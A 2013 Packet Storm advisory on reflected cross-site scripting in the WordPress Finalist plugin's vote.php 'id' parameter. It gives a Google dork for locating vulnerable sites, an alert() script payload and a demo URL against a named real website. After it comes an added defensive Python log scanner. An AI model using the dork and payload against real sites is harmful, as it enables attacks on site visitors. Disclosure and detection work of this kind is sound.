WordPress Finalist Cross Site Scripting

2013-10-14T00:00:00
ID PACKETSTORM:123597
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-10-14T00:00:00

Description

                                        
`#######################################################################  
# Exploit Title : WordPress Finalist Plugin Cross-Site Scripting  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Google Dork : inurl:wp-content/plugins/finalist  
#  
# Software Link : www.wordpress.org  
#  
# Tested on: Windows, Linux  
#  
# Date: 2013/10/14  
#  
#############################################  
# Exploit : Cross-site scripting  
#  
# Location1:  
[Target]/wp-content/plugins/finalist/vote.php?id=[xss]  
#  
#  
# Script For Test : "/><script>alert(1);</script>  
#  
##########################################  
# Demo   
#http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=113%22/%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E  
##############  
#  
# Milad Hacking  
#  
# We Love Mohammad  
#  
##############  
`
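
A defender-side check for the request pattern reported above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to the plugin's `vote.php` whose `id` parameter is not a plain integer. The combined log format, the rule that legitimate `id` values are numeric (suggested by `id=113` in the demo URL), the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path named in the advisory, matched under any install prefix.
VOTE_PATH = re.compile(r"/wp-content/plugins/finalist/vote\.php(?:/|$)", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate id values are short decimal integers.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_ids(log_line):
    """Return decoded id values of a vote.php request that are not numeric."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # Decode the path too, so an encoded form such as vote%2Ephp still matches.
    if not VOTE_PATH.search(unquote(url.path)):
        return []
    # parse_qs percent-decodes values, so %3Cscript%3E and <script> look alike.
    values = parse_qs(url.query, keep_blank_values=True).get("id", [])
    return [v for v in values if not NUMERIC_ID.fullmatch(v)]


def scan(lines):
    """Yield (client_ip, decoded_value) for every flagged request."""
    for line in lines:
        for value in suspicious_ids(line):
            yield line.split(" ", 1)[0], value


# Constructed sample log lines (documentation IP ranges, no real host).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Oct/2013:10:00:01 +0000] "GET /wp-content/plugins/finalist/vote.php?id=113 HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/Oct/2013:10:00:05 +0000] "GET /wp-content/plugins/finalist/vote.php?id=113%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [14/Oct/2013:10:00:09 +0000] "GET /index.php?id=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

The same numeric-only rule can be enforced in front of the site (for example as a WAF or rewrite rule on this path) while the plugin is removed or patched.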